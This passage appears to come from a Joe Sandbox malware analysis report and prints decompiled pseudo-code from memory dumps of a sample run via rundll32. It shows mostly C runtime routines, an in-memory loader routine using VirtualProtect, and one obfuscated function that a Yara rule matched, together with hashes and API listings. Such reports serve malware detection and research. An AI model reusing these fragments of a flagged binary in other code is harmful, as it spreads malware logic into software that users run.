				 *0x1004223c(_a4, _a8, _a12);
				return  *_t11();
			}

0x1002a32c
0x1002a333
0x1002a350
0x00000000
0x1002a350
0x1002a340
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1002A350

Strings

InitializeCriticalSectionEx, xrefs: 1002A320

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction ID: 89e2b04c8fbb43218a6618a6d479a3faddb58d8543dff9c8057a59943af156c2
Opcode Fuzzy Hash: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction Fuzzy Hash: FAE09A32900228B7CB12AF50DC08CDE7F25EF053A1BA08020FE0C99222CB728D20ABC4

Uniqueness

Uniqueness Score: -1.00%

Function 1002A047, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002A047(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E10029D17(3, "FlsAlloc", 0x10045828, 0x10045830); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x1004223c(_a4);
				return  *_t7();
			}

0x1002a05e
0x1002a063
0x1002a06a
0x00000000
0x1002a07b
0x1002a071
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 1002A07B

Strings

FlsAlloc, xrefs: 1002A057

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction ID: e297e765f5911ce58cd0a3eb98764831447a74d013a8c1969b92fd57f96cda80
Opcode Fuzzy Hash: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction Fuzzy Hash: BAE0C23254023477D311A2A06C44DCE7E44DFA27A2BA00034FF08E2111DF661C5185DD

Uniqueness

Uniqueness Score: -1.00%

Function 100283B2, Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E100283B2(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __edi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t89 = __edx;
				_t51 =  *0x1004d054; // 0x940b3682
				_v8 = _t51 ^ _t97;
				_t96 = _a8;
				_t78 = E10027EC5(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E10027F5C(_t96);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x1004d5b0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x1004e524 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											E100050F0(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t96 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t76 = _t96 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t96 + 0x21c)) = E10027E81( *(_t96 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t96 + 4) = 0xfde9;
										 *((intOrPtr*)(_t96 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t96 + 0x18)) = _t92;
										 *((short*)(_t96 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t96 + 8)) = _t92;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E10027FC1(_t90, _t96); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					E100050F0(_t92, _t96 + 0x18, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x1004d5c0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x1004d5a8; // 0x8040201
										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t78;
					 *((intOrPtr*)(_t96 + 8)) = 1;
					 *((intOrPtr*)(_t96 + 0x21c)) = E10027E81(_t78);
					_t85 = _t96 + 0xc;
					_t90 = _v36 + 0x1004d5b4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E100037EA(_t55, _v8 ^ _t97, _t89);
			}

0x100283b2
0x100283ba
0x100283c1
0x100283c6
0x100283d2
0x100283d7
0x1002858d
0x1002858e
0x00000000
0x100283dd
0x100283dd
0x100283df
0x100283e1
0x100283e3
0x100283e6
0x100283f2
0x100283f3
0x100283f6
0x100283fe
0x00000000
0x10028400
0x10028406
0x100284dd
0x100284dd
0x1002840c
0x10028410
0x10028418
0x00000000
0x1002841e
0x10028425
0x10028452
0x10028458
0x1002845a
0x100284d1
0x100284d7
0x00000000
0x00000000
0x00000000
0x00000000
0x1002845c
0x10028466
0x1002846e
0x10028471
0x10028475
0x1002847b
0x1002847d
0x10028481
0x10028484
0x10028486
0x10028486
0x10028489
0x1002848b
0x00000000
0x00000000
0x1002848d
0x10028490
0x1002849b
0x1002849b
0x1002849d
0x00000000
0x00000000
0x10028495
0x1002849a
0x1002849a
0x1002849a
0x1002849f
0x100284a2
0x100284a5
0x00000000
0x00000000
0x00000000
0x100284a5
0x10028486
0x100284a7
0x100284a7
0x100284aa
0x100284af
0x100284af
0x100284b2
0x100284b3
0x100284b3
0x100284b3
0x100284c2
0x100284cb
0x100284cb
0x00000000
0x1002847b
0x10028427
0x10028427
0x1002842a
0x10028430
0x10028433
0x10028437
0x10028437
0x1002843f
0x10028440
0x10028441
0x10028442
0x10028443
0x10028593
0x10028593
0x10028595
0x10028425
0x10028418
0x10028406
0x00000000
0x100283fe
0x100284ef
0x100284f7
0x100284f7
0x100284fb
0x100284fe
0x10028504
0x10028507
0x10028507
0x1002850a
0x1002850c
0x1002850e
0x1002850e
0x10028511
0x10028513
0x00000000
0x00000000
0x10028515
0x10028518
0x10028534
0x10028534
0x10028536
0x00000000
0x00000000
0x1002851d
0x10028523
0x10028525
0x1002852b
0x1002852f
0x1002852f
0x10028530
0x00000000
0x10028530
0x00000000
0x10028523
0x10028538
0x1002853b
0x1002853e
0x00000000
0x00000000
0x00000000
0x1002853e
0x10028540
0x10028540
0x10028543
0x10028544
0x10028547
0x1002854a
0x1002854a
0x10028550
0x10028553
0x10028562
0x1002856b
0x10028570
0x10028576
0x10028577
0x10028577
0x1002857a
0x1002857d
0x10028580
0x10028583
0x10028583
0x10028583
0x00000000
0x10028588
0x10028596
0x100285a4

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

IsValidCodePage.KERNEL32(-00000030,00000000,75FF016A,?,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520), ref: 10028410
GetCPInfo.KERNEL32(00000000,100281A3,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520,10010887), ref: 10028452

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction ID: 1292c3733ea5ef0b459f7b4b9d6145809bbcf0ab6f8e350e1ac26d0884e01cb9
Opcode Fuzzy Hash: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction Fuzzy Hash: E6513578A017568FDB20DF75E8406ABBBE5EF41344F90806FE086CB251E734EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10028141, Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10028141(void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t61;
				signed int _t62;
				char _t65;
				void* _t73;
				void* _t79;
				signed int _t84;
				void* _t91;

				_t91 = __eflags;
				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E10028255(__edx);
				_t37 = E10027EC5(_t91, _a4);
				_t65 = _a12;
				_v16 = _t37;
				_t6 = _t65 + 0x48; // 0x75ff016a
				if(_t37 !=  *((intOrPtr*)( *_t6 + 4))) {
					_push(_t61);
					_t79 = E10024214(0x220);
					_t62 = _t61 | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t9 = _a12 + 0x48; // 0x75ff016a
						_t79 = memcpy(_t79,  *_t9, 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E100283B2(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E10024DD3();
							}
							asm("lock xadd [eax], ebx");
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x1004d180;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x1004d180) {
									_t17 = _t56 + 0x48; // 0x75ff016a
									E100268B3( *_t17);
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x1004d780; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E10027D21(__eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x1004d174 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
							goto L5;
						}
					}
					E100268B3(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x10028141
0x10028141
0x10028149
0x1002814c
0x1002814f
0x10028157
0x1002815c
0x10028162
0x10028165
0x1002816b
0x10028171
0x1002817e
0x10028180
0x10028184
0x10028186
0x100281b6
0x100281b6
0x10028188
0x10028190
0x10028195
0x1002819b
0x1002819e
0x100281a3
0x100281a7
0x100281a9
0x100281c6
0x100281ca
0x100281cc
0x100281cc
0x100281d7
0x100281db
0x100281dc
0x100281de
0x100281e1
0x100281e8
0x100281ea
0x100281ed
0x100281f2
0x100281e8
0x100281f3
0x100281f9
0x100281fe
0x10028200
0x10028206
0x1002820b
0x10028211
0x10028216
0x10028221
0x10028224
0x10028225
0x10028228
0x1002822e
0x10028232
0x10028236
0x10028237
0x1002823c
0x10028240
0x1002824b
0x1002824b
0x10028240
0x100281ab
0x100281b0
0x00000000
0x100281b0
0x100281a9
0x100281b9
0x100281c5
0x1002816d
0x10028170
0x10028170

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

_free.LIBCMT ref: 100281B9

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction ID: b54d8657c3404ae1227455dc142fa3ead591e73700c1e05800aa58c25d242379
Opcode Fuzzy Hash: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction Fuzzy Hash: 1531A379900249AFDB01DFA8E840A9E77F8FF44354F51016AF915DB2A1EB31AE11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B89A, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B89A(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x1004e844; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x1004e844 = _t9;
				}
				_t10 = E10026850(_t9, 4); // executed
				 *0x1004e848 = _t10;
				E100268B3(0);
				if( *0x1004e848 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x1004d6d8;
					do {
						_t1 = _t31 + 0x20; // 0x1004d6f8
						E1002A310(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x1004e848; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x1004e628 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x1004d780;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x1004e844 = _t30;
					 *0x1004e848 = E10026850(_t30, 4);
					_t21 = E100268B3(0);
					if( *0x1004e848 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x1002b89a
0x1002b8a2
0x1002b8a5
0x1002b8ae
0x1002b8b0
0x1002b8b2
0x00000000
0x1002b8b2
0x1002b8a7
0x1002b8a7
0x1002b8b4
0x1002b8b4
0x1002b8b4
0x1002b8bc
0x1002b8c3
0x1002b8c8
0x1002b8d7
0x1002b904
0x1002b905
0x1002b905
0x1002b907
0x1002b90c
0x1002b913
0x1002b917
0x1002b91c
0x1002b926
0x1002b938
0x1002b93c
0x1002b93f
0x1002b94a
0x1002b94a
0x1002b941
0x1002b941
0x1002b944
0x00000000
0x1002b946
0x1002b946
0x1002b948
0x00000000
0x00000000
0x1002b948
0x1002b944
0x1002b951
0x1002b954
0x1002b955
0x1002b955
0x1002b95e
0x1002b961
0x1002b8d9
0x1002b8dc
0x1002b8e9
0x1002b8ee
0x1002b8fd
0x00000000
0x1002b8ff
0x1002b903
0x1002b903
0x1002b8fd

APIs

_free.LIBCMT ref: 1002B8C8
_free.LIBCMT ref: 1002B8EE

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction ID: 2a755c13c050d183703ed98df87f73a555c2f74e7236858a3b8186707cbcc6ed
Opcode Fuzzy Hash: c8e5d362ea8495ed27514b8f8baf0cd57b7e06fc4690afc6db75ee4dc2175301
Instruction Fuzzy Hash: 6911E671A046625BF720DB28BD85B0533E8D742374F99072AF629DB2D1EA70DC828384

Uniqueness

Uniqueness Score: -1.00%

Function 100024F7, Relevance: 3.1, APIs: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100024F7(intOrPtr* _a4, long _a8) {
				int _t34;
				intOrPtr* _t36;
				signed int _t44;
				void* _t45;
				void** _t46;
				unsigned int _t49;
				signed int _t51;
				long _t52;

				_t46 = _a8;
				_t52 = _t46[2];
				if(_t52 == 0) {
					L7:
					return 1;
				}
				_t49 = _t46[3];
				if((_t49 & 0x02000000) == 0) {
					_t44 =  *(0x1004d02c + ((_t49 >> 0x1f) + ((_t49 >> 0x0000001e & 0x00000001) + (_t49 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
					_t33 =  ==  ? _t44 : _t44 | 0x00000200;
					_t34 = VirtualProtect( *_t46, _t52,  ==  ? _t44 : _t44 | 0x00000200,  &_a8); // executed
					if(_t34 != 0) {
						goto L7;
					}
					return _t34;
				}
				_t45 =  *_t46;
				if(_t45 != _t46[1]) {
					goto L7;
				}
				if(_t46[4] != 0) {
					L6:
					VirtualFree(_t45, _t52, 0x4000); // executed
					goto L7;
				}
				_t36 = _a4;
				_t51 =  *(_t36 + 0x30);
				if( *((intOrPtr*)( *_t36 + 0x38)) == _t51 || _t52 % _t51 == 0) {
					goto L6;
				} else {
					goto L7;
				}
			}

0x100024fa
0x100024ff
0x10002504
0x10002542
0x00000000
0x10002544
0x10002506
0x1000250f
0x10002566
0x1000257e
0x10002585
0x1000258d
0x00000000
0x00000000
0x00000000
0x1000258d
0x10002511
0x10002516
0x00000000
0x00000000
0x1000251c
0x10002535
0x1000253c
0x00000000
0x1000253c
0x1000251e
0x10002521
0x10002529
0x00000000
0x00000000
0x00000000
0x00000000

APIs

VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 1000253C
VirtualProtect.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,100026AE,?,?,?,00000018,00000000,00000000,?), ref: 10002585

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction ID: e51ceea41273e8a754766f9e864be966224bb85f234d35eeffc3d3ca3a938713
Opcode Fuzzy Hash: 1386b0ded374da49f1cd6f70c6048c5dd5653c1bca3ca1c7d211eb0841789e4e
Instruction Fuzzy Hash: 8211E032B009158FE304DE09CCA0F16B7AAFF957A1F868158E806CB265DB30ED80CA84

Uniqueness

Uniqueness Score: -1.00%

Function 1001108A, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001108A(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x1004e384 == 0) {
					_push(_t13);
					E100282F8(__ebx); // executed
					_t2 = E10028D2F(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E100111A8(__ebx, _t17);
						if(_t3 != 0) {
							 *0x1004e390 = _t3;
							_t14 = 0;
							 *0x1004e384 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E100268B3(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E100268B3(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x10011091
0x10011097
0x10011098
0x1001109d
0x100110a2
0x100110a6
0x100110ae
0x100110b6
0x100110bd
0x100110c2
0x100110c4
0x100110b8
0x100110b8
0x100110b8
0x100110cb
0x100110a8
0x100110a8
0x100110a8
0x100110d2
0x100110dc
0x10011093
0x10011095
0x10011095

APIs

_free.LIBCMT ref: 100110D2

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction ID: 0111380563e3a9ff58851abe999957ead0dd13a3de9bd6ab037c1be5c9088953
Opcode Fuzzy Hash: 136e8264bd6b277982498fb8982027de4c9d58594c2cae3cb06861e7f2875850
Instruction Fuzzy Hash: 89E0E53AD0A5B142F327D77A7D0129E16C5DB86376F110326F820CF1D1DFB089C15596

Uniqueness

Uniqueness Score: -1.00%

Function 00194F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00194F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0018602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E001907A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00194f80
0x00194f81
0x00194f82
0x00194f86
0x00194f87
0x00194f8c
0x00194fa5
0x00194fa8
0x00194faf
0x00194fb6
0x00194fc7
0x00194fca
0x00194fd7
0x00194fe2
0x00194fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00194FE2

Strings

{#lm, xrefs: 00194FC2

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 669421d0319da74aee6a7711e02dc4a3904e974a89cb5f4147d23ba6b96fd363
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 69F037B081120CFFDF09EFA4D94289EBFBAEB44310F208199E804AB250D3715B509B54

Uniqueness

Uniqueness Score: -1.00%

Function 10005B14, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10005B14(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E1000D81C(__ecx, __eflags, E100059EB); // executed
				 *0x1004d060 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E1000D8CD(_t7, __eflags, _t1, 0x1004dfb4);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E10005B47(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x10005b19
0x10005b1e
0x10005b23
0x10005b27
0x10005b32
0x10005b38
0x10005b39
0x10005b3b
0x10005b46
0x10005b3d
0x10005b3d
0x00000000
0x10005b3d
0x10005b29
0x10005b29
0x10005b2b
0x10005b2b

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005B32
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10005B3D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
